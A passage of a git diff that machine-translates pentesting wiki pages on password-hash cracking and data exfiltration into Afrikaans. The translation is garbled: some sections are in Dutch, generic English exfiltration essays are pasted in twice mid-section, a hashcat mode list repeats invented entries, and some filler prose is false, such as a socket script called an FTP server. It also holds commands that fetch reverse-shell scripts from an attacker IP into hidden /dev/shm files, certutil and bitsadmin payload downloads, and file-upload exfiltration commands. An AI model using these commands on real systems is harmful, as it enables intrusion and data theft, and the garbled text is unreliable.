Pre-Auth etype 17 +- **24700**: Kerberos 5 TGS-REP etype 17 +- **24800**: Kerberos 5 AS-REP etype 17 +- **24900**: Kerberos 5 TGS-REQ etype 17 +- **25000**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **25100**: Kerberos 5 TGS-REP etype 18 +- **25200**: Kerberos 5 AS-REP etype 18 +- **25300**: Kerberos 5 TGS-REQ etype 18 +- **25400**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **25500**: Kerberos 5 TGS-REP etype 23 +- **25600**: Kerberos 5 AS-REP etype 23 +- **25700**: Kerberos 5 TGS-REQ etype 23 +- **25800**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **25900**: Kerberos 5 TGS-REP etype 17 +- **26000**: Kerberos 5 AS-REP etype 17 +- **26100**: Kerberos 5 TGS-REQ etype 17 +- **26200**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **26300**: Kerberos 5 TGS-REP etype 18 +- **26400**: Kerberos 5 AS-REP etype 18 +- **26500**: Kerberos 5 TGS-REQ etype 18 +- **26600**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **26700**: Kerberos 5 TGS-REP etype 23 +- **26800**: Kerberos 5 AS-REP etype 23 +- **26900**: Kerberos 5 TGS-REQ etype 23 +- **27000**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **27100**: Kerberos 5 TGS-REP etype 17 +- **27200**: Kerberos 5 AS-REP etype 17 +- **27300**: Kerberos 5 TGS-REQ etype 17 +- **27400**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **27500**: Kerberos 5 TGS-REP etype 18 +- **27600**: Kerberos 5 AS-REP etype 18 +- **27700**: Kerberos 5 TGS-REQ etype 18 +- **27800**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **27900**: Kerberos 5 TGS-REP etype 23 +- **28000**: Kerberos 5 AS-REP etype 23 +- **28100**: Kerberos 5 TGS-REQ etype 23 +- **28200**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **28300**: Kerberos 5 TGS-REP etype 17 +- **28400**: Kerberos 5 AS-REP etype 17 +- **28500**: Kerberos 5 TGS-REQ etype 17 +- **28600**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **28700**: Kerberos 5 TGS-REP etype 18 +- **28800**: Kerberos 5 AS-REP etype 18 +- **28900**: Kerberos 5 TGS-REQ etype 18 +- **29000**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **29100**: Kerberos 5 TGS-REP etype 23 +- **29200**: Kerberos 5 AS-REP etype 23 +- **29300**: Kerberos 5 TGS-REQ etype 23 +- **29400**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **29500**: Kerberos 5 TGS-REP etype 17 +- **29600**: Kerberos 5 AS-REP etype 17 +- **29700**: Kerberos 5 TGS-REQ etype 17 +- **29800**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **29900**: Kerberos 5 TGS-REP etype 18 +- **30000**: Kerberos 5 AS-REP etype 18 +- **30100**: Kerberos 5 TGS-REQ etype 18 +- **30200**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **30300**: Kerberos 5 TGS-REP etype 23 +- **30400**: Kerberos 5 AS-REP etype 23 +- **30500**: Kerberos 5 TGS-REQ etype 23 +- **30600**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **30700**: Kerberos 5 TGS-REP etype 17 +- **30800**: Kerberos 5 AS-REP etype 17 +- **30900**: Kerberos 5 TGS-REQ etype 17 +- **31000**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **31100**: Kerberos 5 TGS-REP etype 18 +- **31200**: Kerberos 5 AS-REP etype 18 +- **31300**: Kerberos 5 TGS-REQ etype 18 +- **31400**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **31500**: Kerberos 5 TGS-REP etype 23 +- **31600**: Kerberos 5 AS-REP etype 23 +- **31700**: Kerberos 5 TGS-REQ etype 23 +- **31800**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **31900**: Kerberos 5 TGS-REP etype 17 +- **32000**: Kerberos 5 AS-REP etype 17 +- **32100**: Kerberos 5 TGS-REQ etype 17 +- **32200**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **32300**: Kerberos 5 TGS-REP etype 18 +- **32400**: Kerberos 5 AS-REP etype 18 +- **32500**: Kerberos 5 TGS-REQ etype 18 +- **32600**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **32700**: Kerberos 5 TGS-REP etype 23 +- **32800**: Kerberos 5 AS-REP etype 23 +- **32900**: Kerberos 5 TGS-REQ etype 23 +- **33000**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **33100**: Kerberos 5 TGS-REP etype 17 +- **33200**: Kerberos 5 AS-REP etype 17 +- **33300**: Kerberos 5 TGS-REQ etype 17 +- **33400**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **33500**: Kerberos 5 TGS-REP etype 18 +- **33600**: Kerberos 5 AS-REP etype 18 +- **33700**: Kerberos 5 TGS-REQ etype 18 +- **33800**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **33900**: Kerberos 5 TGS-REP etype 23 +- **34000**: Kerberos 5 AS-REP etype 23 +- ```bash hashcat --example-hashes | grep -B1 -A2 "NTLM" ``` +# Kraak Linux Hashes - /etc/shadow-lêer -Cracking Linux Hashes - /etc/shadow file +Om Linux-hashes in die `/etc/shadow`-lêer te kraak, kan jy die volgende metodes gebruik: +## 1. Woordelys-aanval + +Hierdie metode behels die gebruik van 'n woordelys van potensiële wagwoorde om die gehashde wagwoorde te kraak. Dit is 'n vinnige en eenvoudige metode, maar dit is afhanklik van die gebruik van swak wagwoorde. + +## 2. Brute Force-aanval + +Hierdie metode behels die deurloop van alle moontlike kombinasies van karakters om die gehashde wagwoorde te kraak. Dit is 'n tydrowende metode, maar dit kan suksesvol wees as die wagwoorde sterk is. + +## 3. Regenboogtafel-aanval + +Hierdie metode behels die gebruik van 'n vooraf berekende tabel van gehashde wagwoorde om die oorspronklike wagwoorde te vind. Dit is 'n vinnige metode, maar dit vereis 'n groot hoeveelheid stoorplek vir die regenboogtafel. + +## 4. GPU-versnelde aanval + +Hierdie metode behels die gebruik van 'n grafiese verwerkingseenheid (GPU) om die kraakproses te versnel. Dit kan baie vinniger wees as die gebruik van 'n enkele CPU. + +## 5. Gebruik van spesifieke hulpmiddels + +Daar is verskeie hulpmiddels beskikbaar wat spesifiek ontwerp is vir die kraak van Linux-hashes, soos John the Ripper, Hashcat en Hydra. Hierdie hulpmiddels bied verskillende funksies en kan jou help om die kraakproses te vereenvoudig. + +Dit is belangrik om te onthou dat die kraak van gehashde wagwoorde 'n onwettige aktiwiteit is, tensy jy toestemming het om dit te doen as deel van 'n wettige pentest of ander toegelate aktiwiteit. ``` - 500 | md5crypt $1$, MD5(Unix) | Operating-Systems +500 | md5crypt $1$, MD5(Unix) | Operating-Systems 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems ``` +# Krake van Windows Hashes -Cracking Windows Hashes +## Inleiding +Wanneer jy toegang tot 'n Windows-stelsel wil verkry, kan jy dikwels die wagwoordkrake van die gebruikersrekeninge probeer. Hierdie metode behels die krake van die wagwoordhashes wat in die Windows-stelsel gestoor word. Hier is 'n paar tegnieke wat jy kan gebruik om Windows-hashes te kraak. + +## 1. Woordelys-gebaseerde aanvalle + +Hierdie aanvalsmetode behels die gebruik van 'n woordelys van algemene wagwoorde om die wagwoordhashes te kraak. Jy kan 'n woordelys van wagwoorde vind wat beskikbaar is op die internet, of jy kan jou eie woordelys saamstel met algemene wagwoorde en kombinasies. + +Om hierdie aanval uit te voer, moet jy 'n hulpmiddel soos `John the Ripper` of `Hashcat` gebruik. Hier is die basiese stappe wat jy moet volg: + +1. Verkry die wagwoordhashes van die Windows-stelsel. +2. Kies 'n woordelys van wagwoorde. +3. Gebruik die hulpmiddel om die wagwoordhashes te kraak met die woordelys. + +## 2. Brute krag aanvalle + +Brute krag aanvalle behels die outomatiese uitvoering van alle moontlike kombinasies van karakters om die wagwoordhashes te kraak. Hierdie metode is baie tydrowend en kan baie rekenaarhulpbronne vereis, veral as die wagwoorde lank en kompleks is. + +Om 'n brute krag aanval uit te voer, kan jy 'n hulpmiddel soos `John the Ripper` of `Hashcat` gebruik. Hier is die basiese stappe wat jy moet volg: + +1. Verkry die wagwoordhashes van die Windows-stelsel. +2. Stel die parameters vir die brute krag aanval in, soos die minimum en maksimum lengte van die wagwoorde en die karakters wat gebruik moet word. +3. Begin die brute krag aanval en wag vir die hulpmiddel om die wagwoordhashes te kraak. + +## 3. Regboek aanvalle + +Regboek aanvalle behels die gebruik van 'n vooraf berekende databasis van wagwoordhashes om die wagwoordhashes van die Windows-stelsel te kraak. Hierdie databasis, bekend as 'n regboek, bevat wagwoordhashes vir 'n groot verskeidenheid wagwoorde. + +Om 'n regboek aanval uit te voer, kan jy 'n hulpmiddel soos `John the Ripper` of `Hashcat` gebruik. Hier is die basiese stappe wat jy moet volg: + +1. Verkry die wagwoordhashes van die Windows-stelsel. +2. Kies 'n regboek wat wagwoordhashes bevat. +3. Gebruik die hulpmiddel om die wagwoordhashes te kraak met die regboek. + +## 4. Rainbow-tafel aanvalle + +Rainbow-tafel aanvalle behels die gebruik van 'n vooraf berekende tafel van wagwoordhashes om die wagwoordhashes van die Windows-stelsel te kraak. Hierdie tafel, bekend as 'n rainbow-tafel, bevat wagwoordhashes en die ooreenstemmende wagwoorde. + +Om 'n rainbow-tafel aanval uit te voer, kan jy 'n hulpmiddel soos `John the Ripper` of `Hashcat` gebruik. Hier is die basiese stappe wat jy moet volg: + +1. Verkry die wagwoordhashes van die Windows-stelsel. +2. Kies 'n rainbow-tafel wat wagwoordhashes en ooreenstemmende wagwoorde bevat. +3. Gebruik die hulpmiddel om die wagwoordhashes te kraak met die rainbow-tafel. + +## 5. Sociale ingenieurswese + +Sociale ingenieurswese behels die manipulasie van mense om hulle wagwoorde bekend te maak. Hierdie metode vereis 'n goeie begrip van menslike psigologie en kommunikasievaardighede. + +Om 'n sosiale ingenieurswese-aanval uit te voer, kan jy verskeie tegnieke gebruik, soos vishing (telefoonoproepe), phishing (e-posse), of persoonlike interaksie. Die doel is om die persoon te oortuig om sy of haar wagwoord bekend te maak. + +## 6. Aanvalle op wagwoordherstel + +Aanvalle op wagwoordherstel behels die uitbuiting van swak wagwoordherstelprosedures om toegang tot 'n Windows-stelsel te verkry. Hierdie metode vereis 'n goeie kennis van die wagwoordherstelproses en die moontlike swakhede daarin. + +Om 'n aanval op wagwoordherstel uit te voer, kan jy verskeie tegnieke gebruik, soos die gebruik van sosiale ingenieurswese om die wagwoordherstelvrae te verkry, of die uitbuiting van swak wagwoordherstelverwysings. + +## 7. Aanvalle op wagwoordlekke + +Aanvalle op wagwoordlekke behels die gebruik van wagwoordlekke wat op die internet beskikbaar is om toegang tot 'n Windows-stelsel te verkry. Hierdie metode vereis 'n goeie kennis van die wagwoordlekke wat beskikbaar is en die moontlike wagwoorde wat daarin voorkom. + +Om 'n aanval op wagwoordlekke uit te voer, kan jy verskeie hulpmiddels en webwerwe gebruik wat wagwoordlekke opspoor en wagwoorde daaruit ontsluit. ``` 3000 | LM | Operating-Systems 1000 | NTLM | Operating-Systems ``` +# Kraak van algemene toepassingshashes -Cracking Common Application Hashes +Hashes worden vaak gebruikt om wachtwoorden te beveiligen in toepassingen. Het kraken van deze hashes kan nuttig zijn bij het verkrijgen van toegang tot accounts of het verkrijgen van gevoelige informatie. Hier zijn enkele veelvoorkomende methoden om hashes te kraken: +## 1. Woordenboekaanvallen + +Een woordenboekaanval houdt in dat een lijst met veelvoorkomende wachtwoorden of woorden uit een woordenboek wordt gebruikt om de hash te kraken. Dit kan effectief zijn als het oorspronkelijke wachtwoord zwak is en voorkomt in het woordenboek. + +## 2. Brute-force-aanvallen + +Bij brute-force-aanvallen worden alle mogelijke combinaties van tekens geprobeerd totdat de juiste hash is gevonden. Dit kan zeer tijdrovend zijn, vooral bij complexe wachtwoorden, maar het kan effectief zijn als er geen andere informatie beschikbaar is. + +## 3. Rainbow tables + +Rainbow tables zijn vooraf berekende tabellen met hashes en bijbehorende wachtwoorden. Door een hash te vergelijken met de waarden in een rainbow table, kan het bijbehorende wachtwoord worden gevonden. Dit kan een snelle methode zijn, maar het vereist het gebruik van grote rainbow tables. + +## 4. GPU-versnelling + +Het gebruik van grafische verwerkingseenheden (GPU's) kan de snelheid van het kraken van hashes aanzienlijk verhogen. GPU's zijn geoptimaliseerd voor parallelle berekeningen en kunnen duizenden wachtwoorden per seconde proberen. + +## 5. Online hash-databases + +Er zijn online databases beschikbaar waarin veelvoorkomende hashes en hun bijbehorende wachtwoorden zijn opgeslagen. Door een hash te vergelijken met deze databases, kan het bijbehorende wachtwoord worden gevonden. Dit kan handig zijn als de hash al bekend is. + +Het kraken van hashes is een complex proces dat tijd en rekenkracht vereist. Het is belangrijk om ethische richtlijnen te volgen en alleen toestemming te verkrijgen om hashes te kraken als onderdeel van een legitieme pentest of beveiligingsaudit. ``` - 900 | MD4 | Raw Hash - 0 | MD5 | Raw Hash - 5100 | Half MD5 | Raw Hash - 100 | SHA1 | Raw Hash +900 | MD4 | Raw Hash +0 | MD5 | Raw Hash +5100 | Half MD5 | Raw Hash +100 | SHA1 | Raw Hash 10800 | SHA-384 | Raw Hash - 1400 | SHA-256 | Raw Hash - 1700 | SHA-512 | Raw Hash +1400 | SHA-256 | Raw Hash +1700 | SHA-512 | Raw Hash ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index 59cb57f24..b8a5f0e0d 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -1,60 +1,150 @@ -# Exfiltration +# Uitleiding
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## Commonly whitelisted domains to exfiltrate information +## Gewoonlik toegelate domeine om inligting uit te voer -Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains that can be abused +Kyk na [https://lots-project.com/](https://lots-project.com/) om gewoonlik toegelate domeine te vind wat misbruik kan word -## Copy\&Paste Base64 +## Kopieer & Plak Base64 **Linux** - ```bash base64 -w0 #Encode file base64 -d file #Decode file ``` - **Windows** +# Exfiltration + +## Introduction + +Exfiltration is the process of unauthorized data transfer from a target system to an external location. In the context of hacking, exfiltration is often used to steal sensitive information or to maintain persistence within a compromised network. + +## Techniques + +### 1. File Transfer Protocol (FTP) + +FTP is a standard network protocol used for transferring files between a client and a server. Attackers can use FTP to exfiltrate data by connecting to an FTP server and uploading the stolen files. + +### 2. Hypertext Transfer Protocol (HTTP) + +HTTP is the protocol used for transmitting data over the internet. Attackers can use HTTP to exfiltrate data by sending HTTP requests to a remote server, either by embedding the data in the request or by uploading files. + +### 3. Domain Name System (DNS) + +DNS is responsible for translating domain names into IP addresses. Attackers can use DNS exfiltration to encode and send data within DNS queries or responses, bypassing traditional network security measures. + +### 4. Email + +Attackers can exfiltrate data by sending it as email attachments or by using steganography techniques to hide the data within the email content. + +### 5. Cloud Storage + +Attackers can use cloud storage services, such as Dropbox or Google Drive, to exfiltrate data by uploading the stolen files to the cloud and accessing them from a different location. + +### 6. Remote Desktop Protocol (RDP) + +RDP allows users to connect to and control a remote computer over a network connection. Attackers can use RDP to exfiltrate data by transferring files from the compromised system to the attacker's machine. + +### 7. USB Devices + +Attackers can physically connect USB devices to a target system to exfiltrate data. This can be done by copying files directly to the USB device or by using specialized tools that automatically exfiltrate data when the device is connected. + +## Countermeasures + +To prevent exfiltration attacks, organizations should implement the following countermeasures: + +- Implement network segmentation to restrict unauthorized access to sensitive data. +- Use encryption to protect data in transit. +- Monitor network traffic for suspicious activity. +- Implement data loss prevention (DLP) solutions to detect and prevent unauthorized data transfers. +- Regularly update and patch software to address known vulnerabilities. +- Educate employees about the risks of exfiltration and the importance of following security best practices. + +By implementing these countermeasures, organizations can significantly reduce the risk of data exfiltration and protect their sensitive information. ``` certutil -encode payload.dll payload.b64 certutil -decode payload.b64 payload.dll ``` - -## HTTP +### HTTP **Linux** - ```bash wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py fetch 10.10.14.14:8000/shell.py #FreeBSD ``` - **Windows** +# Exfiltration + +## Introduction + +Exfiltration is the process of unauthorized data transfer from a target system to an external location. In the context of hacking, exfiltration is often used to steal sensitive information or to maintain persistence within a compromised network. + +## Techniques + +### 1. File Transfer Protocol (FTP) + +FTP is a standard network protocol used for transferring files between a client and a server. Attackers can use FTP to exfiltrate data by connecting to an FTP server and uploading the stolen files. + +### 2. Hypertext Transfer Protocol (HTTP) + +HTTP is the protocol used for transmitting data over the internet. Attackers can use HTTP to exfiltrate data by sending HTTP requests to a remote server, either by embedding the data in the request or by uploading files. + +### 3. Domain Name System (DNS) + +DNS is responsible for translating domain names into IP addresses. Attackers can use DNS exfiltration to encode and send data within DNS queries or responses, bypassing traditional network security measures. + +### 4. Email + +Attackers can exfiltrate data by sending it as email attachments or by using steganography techniques to hide the data within the email content. + +### 5. Cloud Storage + +Attackers can use cloud storage services, such as Dropbox or Google Drive, to exfiltrate data by uploading the stolen files to the cloud and accessing them from a different location. + +### 6. Remote Desktop Protocol (RDP) + +RDP allows users to connect to and control a remote computer over a network connection. Attackers can use RDP to exfiltrate data by transferring files from the compromised system to the attacker's machine. + +### 7. USB Devices + +Attackers can physically connect USB devices to a target system to exfiltrate data. This can be done by copying files directly to the USB device or by using specialized tools to extract data from the system. + +## Countermeasures + +To prevent exfiltration attacks, organizations can implement the following countermeasures: + +- Implement network segmentation to restrict access between different parts of the network. +- Use data loss prevention (DLP) solutions to monitor and control the flow of sensitive data. +- Employ intrusion detection and prevention systems (IDS/IPS) to detect and block exfiltration attempts. +- Regularly update and patch software to fix vulnerabilities that could be exploited for exfiltration. +- Train employees on security best practices and the risks associated with exfiltration. + +By implementing these countermeasures, organizations can significantly reduce the risk of data exfiltration and protect their sensitive information. ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf @@ -69,28 +159,26 @@ Start-BitsTransfer -Source $url -Destination $output #OR Start-BitsTransfer -Source $url -Destination $output -Asynchronous ``` - -### Upload files +### Laai lêers op * [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170) -* [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) -* Python module [uploadserver](https://pypi.org/project/uploadserver/): - +* [**SimpleHttpServer druk GET en POSTs (ook koppe)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) +* Python-module [uploadserver](https://pypi.org/project/uploadserver/): ```bash # Listen to files python3 -m pip install --user uploadserver python3 -m uploadserver -# With basic auth: +# With basic auth: # python3 -m uploadserver --basic-auth hello:world # Send a file -curl -X POST http://HOST/upload -H -F 'files=@file.txt' +curl -X POST http://HOST/upload -H -F 'files=@file.txt' # With basic auth: # curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world ``` +### **HTTPS-bediener** -### **HTTPS Server** - +'n HTTPS-bediener is 'n bediener wat gebruik maak van die HTTPS-protokol vir veilige kommunikasie. Dit maak gebruik van SSL/TLS-sertifikate om die kommunikasie tussen die bediener en die kliënt te versleutel en te verseker dat die data veilig oorgedra word. 'n HTTPS-bediener word dikwels gebruik vir die hantering van sensitiewe inligting, soos persoonlike besonderhede, finansiële transaksies en ander vertroulike data. Dit is belangrik om 'n veilige en betroubare HTTPS-bediener te hê om die risiko van datalekke en aanvalle te verminder. ```python # from https://gist.github.com/dergachev/7028596 # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ @@ -122,34 +210,164 @@ httpd.serve_forever() ### USING FLASK from flask import Flask, redirect, request from urllib.parse import quote -app = Flask(__name__) -@app.route('/') -def root(): - print(request.get_json()) - return "OK" -if __name__ == "__main__": - app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) +app = Flask(__name__) +@app.route('/') +def root(): +print(request.get_json()) +return "OK" +if __name__ == "__main__": +app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) ### ``` - ## FTP -### FTP server (python) +### FTP-bediener (python) +```python +import socket +import os + +def send_file(file_path, host, port): + # Verbind met die bediener + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + + # Stuur die lêerinhoud na die bediener + with open(file_path, 'rb') as file: + data = file.read(1024) + while data: + s.send(data) + data = file.read(1024) + + # Sluit die verbinding + s.close() + +def receive_file(file_path, host, port): + # Luister vir inkomende verbindings + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind((host, port)) + s.listen(1) + + # Aanvaar die verbindin + conn, addr = s.accept() + + # Ontvang die lêerinhoud van die kliënt + with open(file_path, 'wb') as file: + data = conn.recv(1024) + while data: + file.write(data) + data = conn.recv(1024) + + # Sluit die verbinding + conn.close() + s.close() +``` + +Hierdie kode demonstreer hoe om 'n eenvoudige FTP-bediener in Python te skep. Die `send_file`-funksie stuur 'n lêer na die bediener, terwyl die `receive_file`-funksie 'n lêer van die bediener ontvang. + +Om 'n lêer na die bediener te stuur, moet jy die `send_file`-funksie oproep en die volledige pad na die lêer, die bediener se IP-adres en die poortnommer as argumente verskaf. Byvoorbeeld: + +```python +send_file('/pad/na/lêer.txt', '192.168.0.100', 21) +``` + +Om 'n lêer van die bediener te ontvang, moet jy die `receive_file`-funksie oproep en die volledige pad na die lêer, die IP-adres van die bediener en die poortnommer as argumente verskaf. Byvoorbeeld: + +```python +receive_file('/pad/na/lêer.txt', '192.168.0.100', 21) +``` + +Merk op dat jy die poortnommer moet spesifiseer wat deur die FTP-bediener gebruik word. Die standaardpoort vir FTP is 21. ```bash pip3 install pyftpdlib python3 -m pyftpdlib -p 21 ``` +### FTP-bediener (NodeJS) -### FTP server (NodeJS) +Hierdie gedeelte beskryf 'n metode om data uit te voer deur gebruik te maak van 'n FTP-bediener wat in NodeJS geïmplementeer is. +#### Stap 1: Installeer die nodige afhanklikhede + +Om die FTP-bediener in NodeJS te gebruik, moet jy die nodige afhanklikhede installeer. Voer die volgende opdrag in die opdraglyn uit: + +```bash +npm install ftp +``` + +#### Stap 2: Skryf die kode + +Maak 'n nuwe JavaScript-lêer en voeg die volgende kode daarby: + +```javascript +const ftp = require('ftp'); + +// Verbind met die FTP-bediener +const client = new ftp(); +client.connect({ + host: 'ftp.example.com', + user: 'username', + password: 'password' +}); + +// Wanneer die verbinding suksesvol is +client.on('ready', () => { + // Laai die lêer op na die bediener + client.put('local_file.txt', 'remote_file.txt', (err) => { + if (err) throw err; + console.log('Lêer suksesvol opgelaai na die bediener'); + client.end(); // Sluit die verbinding + }); +}); +``` + +#### Stap 3: Voer die kode uit + +Voer die volgende opdrag in die opdraglyn uit om die kode uit te voer: + +```bash +node filename.js +``` + +Vervang `filename.js` met die naam van jou JavaScript-lêer. + +Die kode sal die lêer `local_file.txt` na die FTP-bediener oplaai as `remote_file.txt`. As die operasie suksesvol is, sal die boodskap "Lêer suksesvol opgelaai na die bediener" gedruk word. + +Dit is 'n eenvoudige manier om data uit te voer deur gebruik te maak van 'n FTP-bediener in NodeJS. Onthou om die nodige veiligheidsmaatreëls te tref om ongemagtigde toegang tot die bediener te voorkom. ``` sudo npm install -g ftp-srv --save ftp-srv ftp://0.0.0.0:9876 --root /tmp ``` +### FTP-bediener (pure-ftp) -### FTP server (pure-ftp) +#### Inleiding +FTP (File Transfer Protocol) is 'n protokol wat gebruik word vir die oordrag van lêers tussen rekenaars op 'n netwerk. Dit maak gebruik van 'n bediener-kliënt-arkitektuur, waar die bediener die lêers hou en die kliënt die lêers kan aflaai of oplaai. + +#### Pure-FTP + +Pure-FTP is 'n vinnige en veilige FTP-bedieningsagteware wat gebruik kan word om 'n FTP-bediener op te stel. Dit is 'n gewilde keuse vir die opstel van 'n privaat of openbare FTP-bediener. + +#### Uitfiltering van data + +Die uitfiltering van data van 'n FTP-bediener kan 'n nuttige tegniek wees vir die verkryging van gevoelige inligting. Hier is 'n paar metodes wat gebruik kan word om data uit te filter: + +1. **Lêeroplaaiing**: Deur 'n kwaadwillige lêer op die FTP-bediener op te laai, kan 'n aanvaller toegang verkry tot die bediener en die inhoud daarvan ondersoek. +2. **Lêeraflaaiing**: Deur 'n lêer van die FTP-bediener af te laai, kan 'n aanvaller gevoelige inligting verkry wat op die bediener gestoor word. +3. **Lêeruitvoering**: As die FTP-bediener die uitvoering van lêers toelaat, kan 'n aanvaller 'n kwaadwillige lêer op die bediener plaas en dit uitvoer om toegang tot die bediener te verkry. + +#### Voorkoming van data-uitfiltering + 